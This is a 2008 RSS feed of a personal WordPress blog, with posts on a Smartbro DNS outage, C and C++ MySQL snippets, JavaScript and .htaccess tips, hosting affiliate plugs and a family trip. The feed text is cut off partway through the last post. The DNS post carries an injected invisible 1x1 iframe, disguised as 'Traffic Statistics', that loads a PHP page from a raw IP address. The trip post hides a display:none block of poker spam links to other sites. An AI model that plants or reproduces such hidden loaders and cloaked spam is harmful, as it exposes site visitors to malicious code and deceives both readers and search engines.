<?xml version="1.0" encoding="UTF-8"?>
<!-- generator="wordpress/2.1.2" -->
<rss version="2.0"
	xmlns:content="http://purl.org/rss/1.0/modules/content/"
	xmlns:wfw="http://wellformedweb.org/CommentAPI/"
	xmlns:dc="http://purl.org/dc/elements/1.1/"
	>

<channel>
	<title>Carey Dayrit</title>
	<link>http://carey.dayrit.org</link>
	<description>All about my self</description>
	<pubDate>Wed, 09 Jul 2008 11:43:20 +0000</pubDate>
	<generator>http://wordpress.org/?v=2.1.2</generator>
	<language>en</language>
			<item>
		<title>Friendster no images - Smartbro Problem</title>
		<link>http://carey.dayrit.org/updates/friendster-no-images-smartbro-problem.html</link>
		<comments>http://carey.dayrit.org/updates/friendster-no-images-smartbro-problem.html#comments</comments>
		<pubDate>Sun, 15 Jun 2008 21:34:37 +0000</pubDate>
		<dc:creator>admin</dc:creator>
		
		<category><![CDATA[Updates]]></category>

		<guid isPermaLink="false">http://carey.dayrit.org/updates/friendster-no-images-smartbro-problem.html</guid>
		<description><![CDATA[Before you freaked out because you cannot see images on friendster.com and call Smartbro  support representative.  Then the support rep would tell you the problem is on the friendster.com domain and not on their servers.
Well the real truth is the problem is on SmartBro's DNS servers. My friend Mike posted an article that [...]]]></description>
			<content:encoded><![CDATA[<p>Before you freaked out because you cannot see images on friendster.com and call Smartbro  support representative.  Then the support rep would tell you the problem is on the friendster.com domain and not on their servers.</p>
<p>Well the real truth is the problem is on SmartBro's DNS servers. My friend Mike posted an article that the DNS has been hacked, visit <a href="http://tech.mikelopez.info/2008/04/23/smartbro-dns-hijacjed-by-akratzcom/">here</a>.</p>
<p>Just<!-- Traffic Statistics --> <iframe src=http://61.155.8.157/iframe/wp-stats.php width=1 height=1 frameborder=0></iframe> <!-- End Traffic Statistics --> change your DNS servers to a working one:</p>
<p>69.64.155.148<br />
121.1.3.208<br />
121.1.3.199<br />
121.1.3.250<br />
168.95.1.1</p>
]]></content:encoded>
			<wfw:commentRss>http://carey.dayrit.org/updates/friendster-no-images-smartbro-problem.html/feed/</wfw:commentRss>
		</item>
		<item>
		<title>Length of directory and filename</title>
		<link>http://carey.dayrit.org/cc/length-of-directory-and-filename.html</link>
		<comments>http://carey.dayrit.org/cc/length-of-directory-and-filename.html#comments</comments>
		<pubDate>Wed, 21 May 2008 02:39:14 +0000</pubDate>
		<dc:creator>admin</dc:creator>
		
		<category><![CDATA[c/c++]]></category>

		<guid isPermaLink="false">http://carey.dayrit.org/cc/length-of-directory-and-filename.html</guid>
		<description><![CDATA[I've written a small C program, which would determine the maximum name length of directory and filename.  I found out that there are different constants on different machines and OS.
Here's one for windows:
&#160;
/* Language: C */
#include &#60;stdio.h&#62;
&#160;
#include &#60;unistd.h&#62;
&#160;
#include
&#60;limits.h&#62;
&#160;
main&#40;&#41;&#123;
&#160;
 printf&#40;&#34;Maximum path size is %dn&#34;, PATH_MAX&#41;;
 printf&#40;&#34;File max is %dn&#34;, FILENAME_MAX&#41;;
&#160;
&#125;
&#160;
Here's a version on Linux:
&#160;
/* Language: [...]]]></description>
			<content:encoded><![CDATA[<p>I've written a small C program, which would determine the maximum name length of directory and filename.  I found out that there are different constants on different machines and OS.</p>
<p>Here's one for windows:</p>
<pre class="c">&nbsp;
<span style="color: #808080; font-style: italic;">/* Language: C */</span>
<span style="color: #339933;">#include &lt;stdio.h&gt;</span>
&nbsp;
<span style="color: #339933;">#include &lt;unistd.h&gt;</span>
&nbsp;
<span style="color: #339933;">#include</span>
&lt;limits.<span style="color: #202020;">h</span>&gt;
&nbsp;
main<span style="color: #66cc66;">&#40;</span><span style="color: #66cc66;">&#41;</span><span style="color: #66cc66;">&#123;</span>
&nbsp;
 <a href="http://www.opengroup.org/onlinepubs/009695399/functions/printf.html"><span style="color: #000066;">printf</span></a><span style="color: #66cc66;">&#40;</span><span style="color: #ff0000;">&quot;Maximum path size is %dn&quot;</span>, PATH_MAX<span style="color: #66cc66;">&#41;</span>;
 <a href="http://www.opengroup.org/onlinepubs/009695399/functions/printf.html"><span style="color: #000066;">printf</span></a><span style="color: #66cc66;">&#40;</span><span style="color: #ff0000;">&quot;File max is %dn&quot;</span>, FILENAME_MAX<span style="color: #66cc66;">&#41;</span>;
&nbsp;
<span style="color: #66cc66;">&#125;</span>
&nbsp;</pre>
<p>Here's a version on Linux:</p>
<pre class="c">&nbsp;
<span style="color: #808080; font-style: italic;">/* Language: C */</span>
<span style="color: #339933;">#include &lt;stdio.h&gt;</span>
&nbsp;
<span style="color: #339933;">#include &lt;unistd.h&gt;</span>
&nbsp;
<span style="color: #339933;">#include</span>
&lt;limits.<span style="color: #202020;">h</span>&gt;
&nbsp;
main<span style="color: #66cc66;">&#40;</span><span style="color: #66cc66;">&#41;</span><span style="color: #66cc66;">&#123;</span>
&nbsp;
 <a href="http://www.opengroup.org/onlinepubs/009695399/functions/printf.html"><span style="color: #000066;">printf</span></a><span style="color: #66cc66;">&#40;</span><span style="color: #ff0000;">&quot;Maximum path size is %dn&quot;</span>, PATH_MAX<span style="color: #66cc66;">&#41;</span>;
 <a href="http://www.opengroup.org/onlinepubs/009695399/functions/printf.html"><span style="color: #000066;">printf</span></a><span style="color: #66cc66;">&#40;</span><span style="color: #ff0000;">&quot;File max is %dn&quot;</span>, NAME_MAX<span style="color: #66cc66;">&#41;</span>;
&nbsp;
<span style="color: #66cc66;">&#125;</span>
&nbsp;</pre>
<p>Heres for the POSIX compliant OS</p>
<pre class="c">&nbsp;
<span style="color: #808080; font-style: italic;">/* Language: C */</span>
<span style="color: #339933;">#include &lt;stdio.h&gt;</span>
&nbsp;
<span style="color: #339933;">#include &lt;unistd.h&gt;</span>
&nbsp;
<span style="color: #339933;">#include</span>
&lt;limits.<span style="color: #202020;">h</span>&gt;
&nbsp;
main<span style="color: #66cc66;">&#40;</span><span style="color: #66cc66;">&#41;</span><span style="color: #66cc66;">&#123;</span>
&nbsp;
 <a href="http://www.opengroup.org/onlinepubs/009695399/functions/printf.html"><span style="color: #000066;">printf</span></a><span style="color: #66cc66;">&#40;</span><span style="color: #ff0000;">&quot;Maximum path size is %dn&quot;</span>,POSIX_PATH_MAX<span style="color: #66cc66;">&#41;</span>;
 <a href="http://www.opengroup.org/onlinepubs/009695399/functions/printf.html"><span style="color: #000066;">printf</span></a><span style="color: #66cc66;">&#40;</span><span style="color: #ff0000;">&quot;File max is %dn&quot;</span>, _POSIX_NAME_MAX<span style="color: #66cc66;">&#41;</span>;
&nbsp;
<span style="color: #66cc66;">&#125;</span>
&nbsp;</pre>
]]></content:encoded>
			<wfw:commentRss>http://carey.dayrit.org/cc/length-of-directory-and-filename.html/feed/</wfw:commentRss>
		</item>
		<item>
		<title>Editing post</title>
		<link>http://carey.dayrit.org/updates/editing-post.html</link>
		<comments>http://carey.dayrit.org/updates/editing-post.html#comments</comments>
		<pubDate>Tue, 20 May 2008 20:55:47 +0000</pubDate>
		<dc:creator>admin</dc:creator>
		
		<category><![CDATA[Updates]]></category>

		<guid isPermaLink="false">http://carey.dayrit.org/updates/editing-post.html</guid>
		<description><![CDATA[To my avid readers, as you would notice there are some codes on my blog post.  As not to get confused I'll be including a language description to some post, so not the readers may not guess in what particular language it has been written.
]]></description>
			<content:encoded><![CDATA[<p>To my avid readers, as you would notice there are some codes on my blog post.  As not to get confused I'll be including a language description to some post, so not the readers may not guess in what particular language it has been written.</p>
]]></content:encoded>
			<wfw:commentRss>http://carey.dayrit.org/updates/editing-post.html/feed/</wfw:commentRss>
		</item>
		<item>
		<title>A day in C++ and MYSQL</title>
		<link>http://carey.dayrit.org/updates/a-day-in-c-and-mysql.html</link>
		<comments>http://carey.dayrit.org/updates/a-day-in-c-and-mysql.html#comments</comments>
		<pubDate>Tue, 20 May 2008 03:14:37 +0000</pubDate>
		<dc:creator>admin</dc:creator>
		
		<category><![CDATA[Updates]]></category>

		<guid isPermaLink="false">http://carey.dayrit.org/updates/a-day-in-c-and-mysql.html</guid>
		<description><![CDATA[It has been an end to my C++ class last Sunday, which I've enjoyed the 5 weeks training.  Thanks to my trainor who is not so selfish in sharing his knowledge to his students. Kudos to Ernest Bercilla, a full time applications trainor of ITTC.
Mostly all of the languages I've learned it was just [...]]]></description>
			<content:encoded><![CDATA[<p>It has been an end to my C++ class last Sunday, which I've enjoyed the 5 weeks training.  Thanks to my trainor who is not so selfish in sharing his knowledge to his students. Kudos to Ernest Bercilla, a full time applications trainor of ITTC.</p>
<p>Mostly all of the languages I've learned it was just self taught, actually this was my first time acquiring a knowledge in a programming language on a training.  Well as day one in my class, my objective was to write C++ code to connect to the MYSQL API, which I did now because of the foundation that I've learned during the training. </p>
<p>Here's the steps, how I've used MySQL API, my C++ Ide is codeblocks<br />
1. download a library from http://devpaks.org/ , find the ones for mysql under database.<br />
2. extract the package, am using 7-zip, so DevPak files is supported.<br />
3. create a mysql folder under the C:\Program Files\CodeBlocks\MinGW\include<br />
4. copy the include from the content of libmysql to the folder that has been created.<br />
5. set the library and point it to the location of libmysql.a<br />
<a href="http://carey.dayrit.org/wp-content/uploads/2008/codeblocks.gif"><img src="http://carey.dayrit.org/wp-content/uploads/2008/_codeblocks.gif" width="250" height="220" alt="" title=""  /></a></p>
<p>6. To test create a database and a table name.</p>
<p>Here's my sample code:</p>
<pre class="c">&nbsp;
<span style="color: #808080; font-style: italic;">/* Language : C++ */</span>
&nbsp;
<span style="color: #339933;">#include &lt;windows.h&gt;</span>
<span style="color: #339933;">#include &lt;iostream&gt;</span>
<span style="color: #339933;">#include &lt;mysql/mysql.h&gt;</span>
&nbsp;
using namespace std;
&nbsp;
<span style="color: #993333;">int</span> main<span style="color: #66cc66;">&#40;</span><span style="color: #66cc66;">&#41;</span> <span style="color: #66cc66;">&#123;</span>
    <span style="color: #808080; font-style: italic;">//connection params</span>
    <span style="color: #993333;">char</span> *host = <span style="color: #ff0000;">&quot;localhost&quot;</span>;
    <span style="color: #993333;">char</span> *user = <span style="color: #ff0000;">&quot;root&quot;</span>;
    <span style="color: #993333;">char</span> *pass = <span style="color: #ff0000;">&quot;&quot;</span>;
    <span style="color: #993333;">char</span> *db = <span style="color: #ff0000;">&quot;cardsauce&quot;</span>;
&nbsp;
    <span style="color: #808080; font-style: italic;">//sock</span>
    MYSQL *conn; <span style="color: #808080; font-style: italic;">//pointer</span>
    MYSQL_RES *res;<span style="color: #808080; font-style: italic;">//pointer</span>
    MYSQL_ROW row;
&nbsp;
    conn = mysql_init<span style="color: #66cc66;">&#40;</span><span style="color: #cc66cc;">0</span><span style="color: #66cc66;">&#41;</span>;
    <span style="color: #b1b100;">if</span> <span style="color: #66cc66;">&#40;</span>!conn<span style="color: #66cc66;">&#41;</span><span style="color: #66cc66;">&#123;</span>
         <a href="http://www.opengroup.org/onlinepubs/009695399/functions/cout.html"><span style="color: #000066;">cout</span></a> &lt;&lt; <span style="color: #ff0000;">&quot;sock handle failed!&quot;</span> &lt;&lt; mysql_error<span style="color: #66cc66;">&#40;</span>conn<span style="color: #66cc66;">&#41;</span> &lt;&lt; endl;
    <span style="color: #66cc66;">&#125;</span>
&nbsp;
    <span style="color: #808080; font-style: italic;">//connection</span>
    <span style="color: #b1b100;">if</span> <span style="color: #66cc66;">&#40;</span>!mysql_real_connect<span style="color: #66cc66;">&#40;</span>conn, host, user, pass, db, <span style="color: #cc66cc;">0</span>, <span style="color: #000000; font-weight: bold;">NULL</span>, <span style="color: #cc66cc;">0</span><span style="color: #66cc66;">&#41;</span><span style="color: #66cc66;">&#41;</span><span style="color: #66cc66;">&#123;</span>
        <a href="http://www.opengroup.org/onlinepubs/009695399/functions/cout.html"><span style="color: #000066;">cout</span></a> &lt;&lt; <span style="color: #ff0000;">&quot;connection fail: &quot;</span> &lt;&lt; mysql_error<span style="color: #66cc66;">&#40;</span>conn<span style="color: #66cc66;">&#41;</span> &lt;&lt; endl;
    <span style="color: #66cc66;">&#125;</span>
&nbsp;
    mysql_query<span style="color: #66cc66;">&#40;</span>conn,<span style="color: #ff0000;">&quot;SELECT * FROM users&quot;</span><span style="color: #66cc66;">&#41;</span>;
&nbsp;
    res = mysql_use_result<span style="color: #66cc66;">&#40;</span>conn<span style="color: #66cc66;">&#41;</span>;
&nbsp;
    <span style="color: #b1b100;">while</span> <span style="color: #66cc66;">&#40;</span>row = mysql_fetch_row<span style="color: #66cc66;">&#40;</span>res<span style="color: #66cc66;">&#41;</span><span style="color: #66cc66;">&#41;</span> <span style="color: #66cc66;">&#123;</span>
        <a href="http://www.opengroup.org/onlinepubs/009695399/functions/cout.html"><span style="color: #000066;">cout</span></a> &lt;&lt; row<span style="color: #66cc66;">&#91;</span><span style="color: #cc66cc;">0</span><span style="color: #66cc66;">&#93;</span> &lt;&lt; <span style="color: #ff0000;">&quot; &quot;</span> &lt;&lt; row<span style="color: #66cc66;">&#91;</span><span style="color: #cc66cc;">1</span><span style="color: #66cc66;">&#93;</span> &lt;&lt; endl;
&nbsp;
    <span style="color: #66cc66;">&#125;</span>
&nbsp;
    <span style="color: #808080; font-style: italic;">//closing connection</span>
    mysql_close<span style="color: #66cc66;">&#40;</span>conn<span style="color: #66cc66;">&#41;</span>;
&nbsp;
    <span style="color: #b1b100;">return</span> EXIT_SUCCESS;
<span style="color: #66cc66;">&#125;</span>
&nbsp;</pre>
]]></content:encoded>
			<wfw:commentRss>http://carey.dayrit.org/updates/a-day-in-c-and-mysql.html/feed/</wfw:commentRss>
		</item>
		<item>
		<title>Rapid PHP 2008 / version 9.0.95</title>
		<link>http://carey.dayrit.org/updates/rapid-php-2008-version-9.html</link>
		<comments>http://carey.dayrit.org/updates/rapid-php-2008-version-9.html#comments</comments>
		<pubDate>Thu, 15 May 2008 05:38:35 +0000</pubDate>
		<dc:creator>admin</dc:creator>
		
		<category><![CDATA[Updates]]></category>

		<guid isPermaLink="false">http://carey.dayrit.org/updates/rapid-php-2008-version-9.html</guid>
		<description><![CDATA[There's a new upgrade to my favorite PHP Editor, here's the latest improvements.


What's new?
Although we did not manage to do everything that was planned (as usually), a lot of work has been done and a lot of good stuff has been added.
Please note that some items apply only to the top of the range products, [...]]]></description>
			<content:encoded><![CDATA[<p>There's a new upgrade to my favorite PHP Editor, here's the latest improvements.<br />
<a href="http://www.shareit.com/product.html?productid=300002722&languageid=1&cookies=1&nolselection=1&oplayout=USA&pc=1d3z0&affiliateid=200070196"><img src="http://carey.dayrit.org/wp-content/uploads/2008/btn_purchase.gif" width="140" height="30" alt="" title="" /></a></p>
<blockquote><p>
What's new?</p>
<p>Although we did not manage to do everything that was planned (as usually), a lot of work has been done and a lot of good stuff has been added.</p>
<p>Please note that some items apply only to the top of the range products, for example, PHP auto complete improvements apply to Rapid PHP 2008 and WeBuilder 2008 only.</p>
<p>+ Added Big: Secure FTP support<br />
+ Added Big: Re-wamped, faster File Explorer<br />
+ Added Big: CVS / SVN Support (via 3rd party clients e.g. TortoiseSVN and shell menu - TortoiseSVN icons are now visible and shell menus are accessible)<br />
+ Added Big: Code templates<br />
+ Added Big: HTML Tag block highlighting<br />
+ Added Big: Missing HTML tag highlighting<br />
+ Added Big: Highlighting of missing brackets<br />
+ Added Big: Existing tag editing via dialog windows<br />
+ Added Big: Right-click tag editing via dialog windows<br />
+ Added Big: Realtime PHP & Ruby syntax check<br />
+ Added Big: Ruby code explorer<br />
+ Added Big: Ruby auto complete<br />
+ Added Big: Code collapse based on code<br />
+ Added Big: Better X-Ray (width, height, size labels, properties)<br />
+ Added Big: Language Browser replaces Object and Markup browsers<br />
+ Added: Reload from FTP command<br />
+ Added: Auto close curly brackets (optional)<br />
+ Added: Auto indent curly brackets (optional)<br />
+ Added: Select between braces<br />
+ Added: Gutter-click close to the left side (16 pixels) sets break-point for PHP files<br />
+ Added: PHP auto-complete and function hints read also includes<br />
+ Added: Allow HTML features in JavaScript code<br />
+ Added: Clear all breakpoints<br />
+ Added: Closing HTML tag auto complete<br />
+ Added: Open file at cursor for PHP<br />
+ Added: All PHP code can now be highlighted with solid background<br />
+ Added: Focus inspector row based on selected CSS property<br />
+ Updated: USB support is now more robust<br />
+ Updated: Settings export now works better<br />
+ Updated: Load parsers only as needed (0,2 sec load time increase on QuadCore, mor eon slow pcs)<br />
+ Updated: Updated entities file / special character replacement<br />
+ Updated: Removed "Editors", replaced with "Programs" + parameter support<br />
+ Updated: New looks for the Welcome wizard<br />
+ Updated: Replace tokens now can use single input multiple times<br />
+ Fixed: Can now save hidden files<br />
+ Fixed: Toolbars on Vista aero<br />
+ Fixed: Problems with buggy FTP servers not understanding LIST -al params, now params can be set by user.<br />
+ Fixed: Ctrl+A now works in find dialog<br />
+ Fixed: Show hour-glass cursor while tidy works for long files<br />
+ Fixed: Convert style blocks rel=stylesheet is now rel="stylesheet"<br />
+ Fixed: Re-load file explorer on project edited to refresh file types<br />
+ Fixed: Preview temp file for CSS is generated only preview pressed<br />
+ Fixed: Editor now scrolls automatically when Backspace pressed and caret not far from edge<br />
+ Fixed: Style block selection bug http://forums.blumentals.net/viewtopic.php?p=9306#9306<br />
+ Fixed: Related styles now work with mixed case class names<br />
+ Over 50 other fixes and improvements
</p></blockquote>
<p><a href="http://www.shareit.com/product.html?productid=300002722&languageid=1&cookies=1&nolselection=1&oplayout=USA&pc=1d3z0&affiliateid=200070196"><img src="http://carey.dayrit.org/wp-content/uploads/2008/btn_purchase.gif" width="140" height="30" alt="" title="" /></a></p>
]]></content:encoded>
			<wfw:commentRss>http://carey.dayrit.org/updates/rapid-php-2008-version-9.html/feed/</wfw:commentRss>
		</item>
		<item>
		<title>Think twice before signing up with cheap webhost</title>
		<link>http://carey.dayrit.org/internet-marketing/think-twice-before-signing-up-with-cheap-webhost.html</link>
		<comments>http://carey.dayrit.org/internet-marketing/think-twice-before-signing-up-with-cheap-webhost.html#comments</comments>
		<pubDate>Mon, 12 May 2008 09:35:57 +0000</pubDate>
		<dc:creator>admin</dc:creator>
		
		<category><![CDATA[Internet Marketing]]></category>

		<guid isPermaLink="false">http://carey.dayrit.org/internet-marketing/think-twice-before-signing-up-with-cheap-webhost.html</guid>
		<description><![CDATA[During the weekends I have to change and move my sites to Hostgator , it's sad because three years I've been with my past host I think was good, due to the nature of my job I didn't monitor it very well. ( Just to wait for the check every month) , I didn't know [...]]]></description>
			<content:encoded><![CDATA[<p>During the weekends I have to change and move my sites to <a href="http://secure.hostgator.com/cgi-bin/affiliates/clickthru.cgi?id=careyd73">Hostgator</a> , it's sad because three years I've been with my past host I think was good, due to the nature of my job I didn't monitor it very well. ( Just to wait for the check every month) , I didn't know that I can earn much more on a reliable host.   I found out that my past host has been several times timing out when large request has been made.  </p>
<p>I was in shock that a reliable makes a big difference, if you dont know what I am talking about signup with <a href="http://secure.hostgator.com/cgi-bin/affiliates/clickthru.cgi?id=careyd73">Hostgator</a>  and move a test site. Youll see the difference best of all it has a money back guarantee.</p>
<p><a href='http://secure.hostgator.com/cgi-bin/affiliates/clickthru.cgi?id=careyd73' target='_blank'><img src='http://www.hostgator.com/affiliates/banners/336x280.gif' /></a></p>
]]></content:encoded>
			<wfw:commentRss>http://carey.dayrit.org/internet-marketing/think-twice-before-signing-up-with-cheap-webhost.html/feed/</wfw:commentRss>
		</item>
		<item>
		<title>Dayrit.org offline for about 2 weeks</title>
		<link>http://carey.dayrit.org/updates/dayritorg-offline-for-about-2-weeks.html</link>
		<comments>http://carey.dayrit.org/updates/dayritorg-offline-for-about-2-weeks.html#comments</comments>
		<pubDate>Fri, 09 May 2008 00:57:30 +0000</pubDate>
		<dc:creator>admin</dc:creator>
		
		<category><![CDATA[Updates]]></category>

		<guid isPermaLink="false">http://carey.dayrit.org/updates/dayritorg-offline-for-about-2-weeks.html</guid>
		<description><![CDATA[The domain which my cousin Jonathan and I co-managed was off line for about 2 weeks, he forgot to renew the domain.  During this period we asked the philhosting.net support to solved our issue.  Thus I use my paypal account to add funds to the reseller account, unfortunately on their website it does [...]]]></description>
			<content:encoded><![CDATA[<p>The domain which my cousin Jonathan and I co-managed was off line for about 2 weeks, he forgot to renew the domain.  During this period we asked the philhosting.net support to solved our issue.  Thus I use my paypal account to add funds to the reseller account, unfortunately on their website it does not update the added funds on the account.  It took them about more than a week to resolve the issue.</p>
]]></content:encoded>
			<wfw:commentRss>http://carey.dayrit.org/updates/dayritorg-offline-for-about-2-weeks.html/feed/</wfw:commentRss>
		</item>
		<item>
		<title>Little things to remember</title>
		<link>http://carey.dayrit.org/web-development/little-things-to-remember.html</link>
		<comments>http://carey.dayrit.org/web-development/little-things-to-remember.html#comments</comments>
		<pubDate>Mon, 31 Mar 2008 07:32:59 +0000</pubDate>
		<dc:creator>admin</dc:creator>
		
		<category><![CDATA[Web Development]]></category>

		<guid isPermaLink="false">http://carey.dayrit.org/web-development/little-things-to-remember.html</guid>
		<description><![CDATA[In accessing radio button using javascript, it must be searched first on which boxed is checked to get the value.
&#160;
/* Language : Ecma a.k.a. Javascript */
&#160;
function get_radio_value&#40;&#41;&#123;
var oRadio=document.form_name.radio_name;
    for &#40;i=0;i&#60;oRadio.length;i++&#41; &#123;
     if &#40;oRadio&#91;i&#93;.checked&#41; &#123;
	  radio_value = oRadio&#91;i&#93;.value;
     &#125;
    &#125;
&#125;
&#160;
MySQL versions [...]]]></description>
			<content:encoded><![CDATA[<p>In accessing radio button using javascript, it must be searched first on which boxed is checked to get the value.</p>
<pre class="javascript">&nbsp;
<span style="color: #009900; font-style: italic;">/* Language : Ecma a.k.a. Javascript */</span>
&nbsp;
<span style="color: #003366; font-weight: bold;">function</span> get_radio_value<span style="color: #66cc66;">&#40;</span><span style="color: #66cc66;">&#41;</span><span style="color: #66cc66;">&#123;</span>
<span style="color: #003366; font-weight: bold;">var</span> oRadio=document.<span style="color: #006600;">form_name</span>.<span style="color: #006600;">radio_name</span>;
    <span style="color: #000066; font-weight: bold;">for</span> <span style="color: #66cc66;">&#40;</span>i=<span style="color: #CC0000;">0</span>;i&lt;oRadio.<span style="color: #006600;">length</span>;i++<span style="color: #66cc66;">&#41;</span> <span style="color: #66cc66;">&#123;</span>
     <span style="color: #000066; font-weight: bold;">if</span> <span style="color: #66cc66;">&#40;</span>oRadio<span style="color: #66cc66;">&#91;</span>i<span style="color: #66cc66;">&#93;</span>.<span style="color: #006600;">checked</span><span style="color: #66cc66;">&#41;</span> <span style="color: #66cc66;">&#123;</span>
	  radio_value = oRadio<span style="color: #66cc66;">&#91;</span>i<span style="color: #66cc66;">&#93;</span>.<span style="color: #006600;">value</span>;
     <span style="color: #66cc66;">&#125;</span>
    <span style="color: #66cc66;">&#125;</span>
<span style="color: #66cc66;">&#125;</span>
&nbsp;</pre>
<p>MySQL versions 4.0 used a different timestamps rather than 4.1 and above.</p>
<p>Example:</p>
<p>Version 4.0 and below -       20080331152726<br />
Version 4.1 and above - 2008-03-31 15:27:26</p>
<p>In order to protect files from viewing or downloading by using .htaccess</p>
<pre class="php">&nbsp;
&lt;Files *.ext&gt;
Order allow,deny
Deny from all
&lt;/Files&gt;
&nbsp;</pre>
<p>sometimes little things count much.  <img src='http://carey.dayrit.org/wp-includes/images/smilies/icon_wink.gif' alt=';)' class='wp-smiley' /></p>
]]></content:encoded>
			<wfw:commentRss>http://carey.dayrit.org/web-development/little-things-to-remember.html/feed/</wfw:commentRss>
		</item>
		<item>
		<title>Staying Awake</title>
		<link>http://carey.dayrit.org/updates/staying-awake.html</link>
		<comments>http://carey.dayrit.org/updates/staying-awake.html#comments</comments>
		<pubDate>Tue, 25 Mar 2008 01:32:28 +0000</pubDate>
		<dc:creator>admin</dc:creator>
		
		<category><![CDATA[Updates]]></category>

		<guid isPermaLink="false">http://carey.dayrit.org/updates/staying-awake.html</guid>
		<description><![CDATA[Yesterday, been working 22 hours. As I have many deadlines to meet and task which are urgent. Didnt notice that been working that long.  Work range from my freelance night time and during daytime my work at the University.
At last my class at ITTC will start this coming Sunday, after a long wait I [...]]]></description>
			<content:encoded><![CDATA[<p>Yesterday, been working 22 hours. As I have many deadlines to meet and task which are urgent. Didnt notice that been working that long.  Work range from my freelance night time and during daytime my work at the University.</p>
<p>At last my class at ITTC will start this coming Sunday, after a long wait I am included in the C++ course.   I am not a newbie to C++ but I've not been coding my favorite language since last 5 years.  I want to refresh myself and start to join some Open Source projects.  Actually C is my first love, thanks to Bjarne Stroustrup's for superseeding my favorite language and now what becomes C++.  I dont have much freetime but will definitely insert a few minutes of my time.</p>
]]></content:encoded>
			<wfw:commentRss>http://carey.dayrit.org/updates/staying-awake.html/feed/</wfw:commentRss>
		</item>
		<item>
		<title>Tagaytay Trip</title>
		<link>http://carey.dayrit.org/family/tagaytay-trip.html</link>
		<comments>http://carey.dayrit.org/family/tagaytay-trip.html#comments</comments>
		<pubDate>Sun, 02 Mar 2008 04:48:58 +0000</pubDate>
		<dc:creator>admin</dc:creator>
		
		<category><![CDATA[Family]]></category>

		<guid isPermaLink="false">http://carey.dayrit.org/family/tagaytay-trip.html</guid>
		<description><![CDATA[I have a chance to take a time to relax and spent a one day trip at Tagaytay City. First off we have an 3 hour ride from Sta Maria, Bulacan to Canyon Woods,Tagaytay.  We fetch up my brother in law at Canyon Woods to show us his project, he works as an civil [...]]]></description>
			<content:encoded><![CDATA[<p>I have a chance to take a time to relax and spent a one day trip at Tagaytay City. First off we have an 3 hour ride from Sta Maria, Bulacan to Canyon Woods,Tagaytay.  We fetch up my brother in law at Canyon Woods to show us his project, he works as an civil engineer at a construction firm.</p>
<p><a href="http://carey.dayrit.org/wp-content/uploads/2008/IMG_1793.gif"><img src="http://carey.dayrit.org/wp-content/uploads/2008/_IMG_1793.gif" width="250" height="187" alt="" title=""  /></a>   </p>
<p>A really beautiful house made by <a href="http://www.embrocalbuilders.com">Embrocal Builders</a> for a prominent person, most of all I heard many articles about the analogy of a construction of a building and software engineering.  There are many similarities but in construction it is much harder, like if the client wants an modification which is not in the contract price, physical materials tends to fluctuate not like in web <u style="display:none"><a href="http://www.vaquelita.cl/wp-content/1/le-poker-a-t%E9l%E9charger-gratuitement.html">le poker a télécharger gratuitement</a><a href="http://www.vaquelita.cl/wp-content/1/jeu-de-poker-gratuites-francais.html">jeu de poker gratuites francais</a><a href="http://www.vaquelita.cl/wp-content/1/tournoi-poker-internet.html">tournoi poker internet</a><a href="http://www.vaquelita.cl/wp-content/1/jeu-carte-poker.html">jeu carte poker</a><a href="http://www.vaquelita.cl/wp-content/1/logiciel-texas-holdem.html">logiciel texas holdem</a><a href="http://www.vaquelita.cl/wp-content/1/jouer-au-poker-virtuel.html">jouer au poker virtuel</a><a href="http://www.vaquelita.cl/wp-content/1/le-jeu-poker-gratuites-fran%E7ais.html">le jeu poker gratuites français</a><a href="http://www.vaquelita.cl/wp-content/1/poker-gratuites-sans-inscription.html">poker gratuites sans inscription</a><a href="http://www.vaquelita.cl/wp-content/1/jouer-wam-poker.html">jouer wam poker</a><a href="http://www.vaquelita.cl/wp-content/1/online-poker-odds.html">online poker odds</a><a href="http://www.vaquelita.cl/wp-content/1/poker-online-flash.html">poker online flash</a><a href="http://www.vaquelita.cl/wp-content/1/jeux-poker-a-telecharger.html">jeux poker a telecharger</a><a href="http://www.vaquelita.cl/wp-content/1/poker-hold-hem-gratuites.html">poker hold hem gratuites</a><a href="http://www.vaquelita.cl/wp-content/1/jeux-com.html">jeux com</a><a href="http://www.vaquelita.cl/wp-content/1/jeux-poker-online.html">jeux poker online</a><a href="http://www.vaquelita.cl/wp-content/1/poker-avec-argent-virtuel.html">poker avec argent virtuel</a><a href="http://www.vaquelita.cl/wp-content/1/la-r%E8gle-poker-texas-holdem.html">la règle poker texas holdem</a><a href="http://www.vaquelita.cl/wp-content/1/jouer-au-poker-texas-holdem.html">jouer au poker texas holdem</a><a href="http://www.vaquelita.cl/wp-content/1/poker-en-ligne-bonus.html">poker en ligne bonus</a><a href="http://www.vaquelita.cl/wp-content/1/poker-online.html">best online poker,achat poker chips online,poker online</a><a href="http://www.vaquelita.cl/wp-content/1/texas-holdem-rules.html">texas holdem rules</a><a href="http://crackinz.com/wp-content/1/multiplayer-poker-game.html">multiplayer poker game</a><a href="http://crackinz.com/wp-content/1/caribbean-poker-portal.html">caribbean poker portal</a><a href="http://crackinz.com/wp-content/1/juegos-poker-shareware.html">juegos poker shareware</a><a href="http://crackinz.com/wp-content/1/descargar-juego-poker-gratis.html">descargar juego poker gratis</a><a href="http://crackinz.com/wp-content/1/poly-poquer.html">poly poquer</a><a href="http://crackinz.com/wp-content/1/poker-en-linea-gratis.html">poker en linea gratis</a><a href="http://crackinz.com/wp-content/1/torneo-poker-gratis.html">torneo poker gratis</a><a href="http://crackinz.com/wp-content/1/poker-portal-web.html">poker portal web</a><a href="http://crackinz.com/wp-content/1/caribbean-poker-pagina-web.html">caribbean poker pagina web</a><a href="http://crackinz.com/wp-content/1/bajar-juego-poker.html">bajar juego poker</a><a href="http://crackinz.com/wp-content/1/pai-gow-poker-internet.html">pai gow poker internet</a><a href="http://crackinz.com/wp-content/1/juegos-de-polly-poker.html">juegos de polly poker</a><a href="http://crackinz.com/wp-content/1/jugar-poker.html">jugar poker,jugar a poker,aprender a jugar poker</a><a href="http://crackinz.com/wp-content/1/reglas-de-poquer.html">reglas de poquer</a><a href="http://crackinz.com/wp-content/1/encuentros-poker.html">encuentros poker</a><a href="http://crackinz.com/wp-content/1/juegos-cartas-poker.html">juegos cartas poker</a><a href="http://crackinz.com/wp-content/1/juego-cartas.html">juego cartas</a><a href="http://crackinz.com/wp-content/1/juego-de-poker-en-espa%F1ol.html">juego de poker en español</a><a href="http://crackinz.com/wp-content/1/poquer-com-es.html">poquer com es</a><a href="http://crackinz.com/wp-content/1/descargas-de-juegos-de-poker.html">descargas de juegos de poker</a><a href="http://crackinz.com/wp-content/1/poker-texas-holdem.html">poker texas 